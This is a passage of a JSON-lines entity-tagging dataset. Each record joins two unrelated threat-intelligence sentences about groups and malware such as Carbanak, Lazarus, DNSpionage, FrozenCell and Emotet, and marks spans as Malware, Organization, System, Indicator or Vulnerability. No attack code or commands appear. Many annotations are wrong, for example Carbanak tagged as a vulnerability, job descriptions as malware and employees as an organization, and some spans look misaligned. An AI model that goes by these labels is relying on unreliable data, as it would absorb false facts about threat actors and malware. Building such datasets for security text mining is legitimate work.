Hackers used the remote access to detect servers of their interest in the internal network .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 156, "end": 171, "label": "Malware"}]} {"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . In 2015 , the Metel gang began to target banks and financial institutions directly .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 68, "end": 75, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 211, "end": 233, "label": "Organization"}]} {"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services .", "spans": [{"start": 29, "end": 44, "label": "Malware"}, {"start": 45, "end": 65, "label": "Malware"}, {"start": 148, "end": 177, "label": "Malware"}, {"start": 251, "end": 256, "label": "Malware"}, {"start": 262, "end": 269, "label": "Organization"}, {"start": 270, "end": 276, "label": "Malware"}, {"start": 293, "end": 299, "label": "Malware"}]} {"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . 
After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 47, "end": 52, "label": "Malware"}, {"start": 65, "end": 100, "label": "Malware"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}]} {"text": "To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . COVELLITE operates globally with targets primarily in Europe , East Asia , and North America .", "spans": [{"start": 54, "end": 68, "label": "Malware"}, {"start": 127, "end": 156, "label": "Malware"}]} {"text": "For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies .", "spans": [{"start": 28, "end": 41, "label": "System"}, {"start": 125, "end": 148, "label": "Malware"}, {"start": 179, "end": 202, "label": "Malware"}, {"start": 227, "end": 249, "label": "System"}, {"start": 355, "end": 373, "label": "Organization"}]} {"text": "The HTA files contained job descriptions and links to job postings on popular employment websites . 
LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 50, "label": "Malware"}, {"start": 173, "end": 186, "label": "Organization"}, {"start": 202, "end": 209, "label": "System"}]} {"text": "ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 46, "end": 63, "label": "Organization"}, {"start": 105, "end": 134, "label": "Malware"}, {"start": 237, "end": 246, "label": "Malware"}, {"start": 247, "end": 254, "label": "Malware"}, {"start": 289, "end": 305, "label": "Malware"}]} {"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . 
COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia .", "spans": [{"start": 29, "end": 46, "label": "System"}, {"start": 66, "end": 84, "label": "Malware"}, {"start": 93, "end": 105, "label": "System"}, {"start": 110, "end": 128, "label": "Malware"}, {"start": 131, "end": 154, "label": "Malware"}, {"start": 157, "end": 177, "label": "Malware"}, {"start": 188, "end": 235, "label": "Malware"}, {"start": 238, "end": 249, "label": "Malware"}]} {"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry .", "spans": [{"start": 60, "end": 83, "label": "Malware"}, {"start": 171, "end": 200, "label": "Malware"}, {"start": 342, "end": 348, "label": "Organization"}, {"start": 394, "end": 406, "label": "Organization"}]} {"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . 
Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": [{"start": 65, "end": 71, "label": "Organization"}, {"start": 79, "end": 107, "label": "Malware"}, {"start": 283, "end": 307, "label": "Malware"}, {"start": 312, "end": 334, "label": "Malware"}]} {"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell .", "spans": [{"start": 36, "end": 51, "label": "System"}, {"start": 54, "end": 66, "label": "Malware"}, {"start": 119, "end": 160, "label": "Malware"}, {"start": 163, "end": 170, "label": "Organization"}, {"start": 238, "end": 248, "label": "Malware"}]} {"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": [{"start": 80, "end": 87, "label": "Malware"}, {"start": 90, "end": 127, "label": "Malware"}, {"start": 237, "end": 246, "label": "Organization"}, {"start": 270, "end": 289, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}, {"start": 324, "end": 332, "label": "Organization"}, {"start": 365, "end": 386, "label": "Organization"}]} {"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . 
Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 41, "end": 58, "label": "Malware"}]} {"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 70, "end": 92, "label": "Malware"}, {"start": 97, "end": 122, "label": "Malware"}, {"start": 162, "end": 172, "label": "Malware"}, {"start": 272, "end": 289, "label": "Organization"}]} {"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector .", "spans": [{"start": 26, "end": 47, "label": "Malware"}, {"start": 58, "end": 73, "label": "System"}, {"start": 79, "end": 95, "label": "Malware"}, {"start": 178, "end": 191, "label": "Malware"}]} {"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . 
Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying .", "spans": [{"start": 49, "end": 61, "label": "Organization"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 156, "end": 181, "label": "Organization"}, {"start": 184, "end": 187, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 262, "end": 276, "label": "Organization"}, {"start": 421, "end": 428, "label": "System"}]} {"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 125, "end": 147, "label": "Malware"}, {"start": 190, "end": 198, "label": "Organization"}, {"start": 201, "end": 209, "label": "Organization"}, {"start": 212, "end": 221, "label": "Organization"}, {"start": 224, "end": 228, "label": "Organization"}, {"start": 235, "end": 243, "label": "Organization"}]} {"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . 
For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": [{"start": 24, "end": 34, "label": "Organization"}, {"start": 263, "end": 273, "label": "Malware"}, {"start": 300, "end": 312, "label": "Malware"}, {"start": 346, "end": 354, "label": "Organization"}]} {"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , industrial control systems and SCADA , government , and media for espionage and destructive purposes , since at least 2011 . It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 213, "end": 223, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}, {"start": 566, "end": 603, "label": "Organization"}]} {"text": "This adversary has been identified leveraging custom-developed plugins for versions 2 and 3 of the commodity malware Black Energy to target entities associated with energy , government , and media for espionage and destructive purposes , since at least 2011 . 
The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": [{"start": 117, "end": 129, "label": "System"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 201, "end": 210, "label": "Organization"}, {"start": 365, "end": 384, "label": "Organization"}, {"start": 393, "end": 414, "label": "Organization"}]} {"text": "If you haven't heard about it for some reason , I would recommend to read this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product .", "spans": [{"start": 98, "end": 106, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 238, "end": 242, "label": "Malware"}, {"start": 286, "end": 294, "label": "Organization"}]} {"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google\u00ae , Facebook\u00ae , MySpace\u00ae , Instagram\u00ae , and various dating and blogging sites . 
VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others .", "spans": [{"start": 106, "end": 118, "label": "Organization"}, {"start": 131, "end": 138, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 164, "end": 174, "label": "Organization"}, {"start": 189, "end": 214, "label": "Organization"}, {"start": 217, "end": 221, "label": "Malware"}]} {"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 107, "end": 115, "label": "Organization"}, {"start": 227, "end": 238, "label": "Organization"}, {"start": 312, "end": 319, "label": "Malware"}]} {"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 158, "end": 165, "label": "Organization"}, {"start": 198, "end": 212, "label": "Organization"}]} {"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . 
Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers .", "spans": [{"start": 0, "end": 20, "label": "Organization"}, {"start": 64, "end": 70, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 134, "end": 139, "label": "System"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 281, "end": 284, "label": "Indicator"}, {"start": 335, "end": 361, "label": "System"}, {"start": 364, "end": 367, "label": "System"}]} {"text": "Furthermore , there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations . Talos reported that these DNS hijacks also paved the ACT for the attackers to obtain SSL encryption certificates for the targeted domains ( webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 100, "end": 110, "label": "Organization"}, {"start": 141, "end": 146, "label": "Organization"}, {"start": 281, "end": 303, "label": "Indicator"}, {"start": 354, "end": 359, "label": "System"}, {"start": 364, "end": 367, "label": "System"}]} {"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . That changed on Jan. 
25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 66, "end": 73, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 243, "end": 254, "label": "Organization"}]} {"text": "While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 157, "end": 172, "label": "Organization"}, {"start": 489, "end": 492, "label": "Indicator"}, {"start": 540, "end": 549, "label": "Organization"}, {"start": 554, "end": 573, "label": "Organization"}]} {"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . 
PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage .", "spans": [{"start": 15, "end": 31, "label": "System"}, {"start": 35, "end": 39, "label": "Organization"}, {"start": 179, "end": 199, "label": "Organization"}, {"start": 361, "end": 364, "label": "Indicator"}, {"start": 399, "end": 402, "label": "Indicator"}]} {"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . This APT group usually carries out target attacks against government agencies to steal sensitive information .", "spans": [{"start": 8, "end": 16, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 285, "end": 304, "label": "Organization"}]} {"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . 
In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 134, "end": 145, "label": "Organization"}, {"start": 150, "end": 163, "label": "Organization"}, {"start": 201, "end": 220, "label": "Organization"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 236, "end": 244, "label": "Organization"}, {"start": 448, "end": 460, "label": "Malware"}]} {"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware .", "spans": [{"start": 68, "end": 71, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 411, "end": 418, "label": "System"}, {"start": 423, "end": 430, "label": "Malware"}, {"start": 431, "end": 438, "label": "Malware"}]} {"text": "Emotet activity in 2019 included several high-volume campaigns that collectively distributed tens of millions of messages primarily targeting the manufacturing and healthcare industries . 
In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities .", "spans": [{"start": 146, "end": 159, "label": "Organization"}, {"start": 164, "end": 185, "label": "Organization"}, {"start": 238, "end": 245, "label": "System"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 281, "end": 300, "label": "Organization"}]} {"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 46, "end": 52, "label": "System"}, {"start": 166, "end": 172, "label": "System"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 235, "label": "Malware"}, {"start": 238, "end": 248, "label": "Malware"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 420, "end": 427, "label": "Malware"}]} {"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . 
From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 162, "end": 168, "label": "System"}, {"start": 195, "end": 208, "label": "Malware"}, {"start": 211, "end": 231, "label": "Malware"}, {"start": 234, "end": 244, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}]} {"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen .", "spans": [{"start": 132, "end": 141, "label": "Organization"}, {"start": 146, "end": 154, "label": "Organization"}, {"start": 165, "end": 178, "label": "Organization"}, {"start": 199, "end": 213, "label": "Malware"}]} {"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": [{"start": 124, "end": 135, "label": "Organization"}, {"start": 207, "end": 225, "label": "Organization"}, {"start": 309, "end": 320, "label": "Organization"}, {"start": 323, "end": 329, "label": "Organization"}, {"start": 337, "end": 344, "label": "Malware"}, {"start": 345, "end": 352, "label": "Malware"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}]} {"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . 
El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 53, "end": 63, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 74, "end": 92, "label": "Organization"}, {"start": 99, "end": 118, "label": "Organization"}, {"start": 203, "end": 212, "label": "Organization"}]} {"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 .", "spans": [{"start": 88, "end": 96, "label": "Organization"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}]} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 289, "end": 291, "label": "System"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 214, "end": 221, "label": "Malware"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 266, "end": 287, "label": "Organization"}, {"start": 290, "end": 298, "label": "Organization"}, {"start": 301, "end": 318, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 344, "end": 349, "label": "Organization"}, {"start": 354, "end": 363, "label": "Organization"}, {"start": 370, "end": 393, "label": "Organization"}]} {"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . 
Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 19, "end": 35, "label": "Organization"}, {"start": 142, "end": 155, "label": "Organization"}]} {"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . It was a targeted attack we are calling \" Machete \" .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}]} {"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}, {"start": 199, "end": 223, "label": "Malware"}, {"start": 311, "end": 320, "label": "Indicator"}]} {"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . \" Machete \" is a targeted attack campaign with Spanish speaking roots .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 77, "end": 90, "label": "Organization"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 203, "end": 219, "label": "Malware"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 260, "end": 267, "label": "Organization"}]} {"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code .", "spans": [{"start": 172, "end": 182, "label": "Organization"}, {"start": 312, "end": 318, "label": "System"}]} {"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . 
We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) .", "spans": [{"start": 40, "end": 53, "label": "Organization"}, {"start": 56, "end": 78, "label": "Organization"}, {"start": 81, "end": 92, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 285, "end": 291, "label": "Organization"}, {"start": 296, "end": 303, "label": "Organization"}, {"start": 304, "end": 307, "label": "Organization"}]} {"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community .", "spans": [{"start": 92, "end": 102, "label": "Organization"}, {"start": 189, "end": 205, "label": "Organization"}, {"start": 208, "end": 224, "label": "Organization"}, {"start": 258, "end": 273, "label": "Organization"}, {"start": 280, "end": 304, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 377, "end": 404, "label": "System"}, {"start": 529, "end": 546, "label": "Organization"}]} {"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . 
These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 77, "end": 85, "label": "Organization"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 227, "end": 236, "label": "Malware"}, {"start": 340, "end": 357, "label": "Organization"}]} {"text": "Patchwork ( also known as Dropping Elephant ) is a cyberespionage group whose targets included diplomatic and government agencies as well as businesses . The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 26, "end": 43, "label": "Organization"}, {"start": 51, "end": 71, "label": "Organization"}, {"start": 95, "end": 105, "label": "Organization"}, {"start": 110, "end": 129, "label": "Organization"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 220, "end": 258, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}]} {"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . 
It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 147, "end": 157, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 425, "end": 431, "label": "System"}]} {"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . Where they exist , they often use grey market or pirated software .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 57, "end": 81, "label": "System"}, {"start": 93, "end": 111, "label": "Organization"}, {"start": 242, "end": 253, "label": "Malware"}, {"start": 257, "end": 273, "label": "Malware"}]} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . 
Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 277, "end": 283, "label": "System"}, {"start": 327, "end": 336, "label": "Indicator"}, {"start": 358, "end": 365, "label": "Vulnerability"}, {"start": 375, "end": 381, "label": "Malware"}]} {"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 21, "end": 39, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 275, "end": 283, "label": "Organization"}, {"start": 290, "end": 295, "label": "Organization"}]} {"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies . 
